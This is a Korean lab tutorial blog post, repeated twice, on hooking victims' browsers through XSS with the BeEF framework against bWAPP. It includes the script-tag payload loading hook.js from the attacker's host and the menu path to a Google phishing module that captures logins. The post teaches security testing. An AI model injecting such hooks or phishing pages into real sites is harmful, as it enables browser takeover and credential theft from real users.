경고 : 반드시 실습 환경에서 진행하시고, 상용 망에 실행하여 처벌 받을 시 작성자와 무관함을 알립니다.
실습 환경: kali linux 2023 버전, bwapp
오늘은 BeEF 프레임워크를 활용한 XSS 공격을 실습해 볼 것 입니다.
1. beEF 설치
sudo apt-get install beef-xss
이후 beef-xss 명령어로 실행이 가능합니다.
제일 처음에 beef-xss를 실행하면 비밀번호를 입력하라고 나옵니다.
아무 비밀번호나 설정해도 상관없습니다.
http://127.0.0.1:3000/ui/panel로 이동하면 이런 화면이 나옵니다.
username은 beef password는 아까 설정한 걸로 입력하면 됩니다.
2. 스크립트 삽입
<script src="http://<IP>:3000/hook.js"></script> IP는 자기 아이피로 하고 스크립트를 삽입합니다.
입력한 곳에 피해자가 오면?
3. 사용법
이렇게 좀비가 되는 모습을 볼 수 있습니다
피싱 사이트로 이동시킬 수도 있습니다.
commands > Module Tree > Social Engineering > Google Phishing > Execute
이곳에서 로그인 하면?
이렇게 뜨는 것을 볼 수 있습니다
'웹해킹' 카테고리의 다른 글
| (웹모의해킹)DVWA와 파이썬을 활용한 Dictionary Attack 실습 (0) | 2023.08.01 |
|---|
경고 : 반드시 실습 환경에서 진행하시고, 상용 망에 실행하여 처벌 받을 시 작성자와 무관함을 알립니다.
실습 환경: kali linux 2023 버전, bwapp
오늘은 BeEF 프레임워크를 활용한 XSS 공격을 실습해 볼 것 입니다.
1. beEF 설치
sudo apt-get install beef-xss
이후 beef-xss 명령어로 실행이 가능합니다.
제일 처음에 beef-xss를 실행하면 비밀번호를 입력하라고 나옵니다.
아무 비밀번호나 설정해도 상관없습니다.
http://127.0.0.1:3000/ui/panel로 이동하면 이런 화면이 나옵니다.
username은 beef password는 아까 설정한 걸로 입력하면 됩니다.
2. 스크립트 삽입
<script src="http://<IP>:3000/hook.js"></script> IP는 자기 아이피로 하고 스크립트를 삽입합니다.
입력한 곳에 피해자가 오면?
3. 사용법
이렇게 좀비가 되는 모습을 볼 수 있습니다
피싱 사이트로 이동시킬 수도 있습니다.
commands > Module Tree > Social Engineering > Google Phishing > Execute
이곳에서 로그인 하면?
이렇게 뜨는 것을 볼 수 있습니다
'웹해킹' 카테고리의 다른 글
| (웹모의해킹)DVWA와 파이썬을 활용한 Dictionary Attack 실습 (0) | 2023.08.01 |
|---|
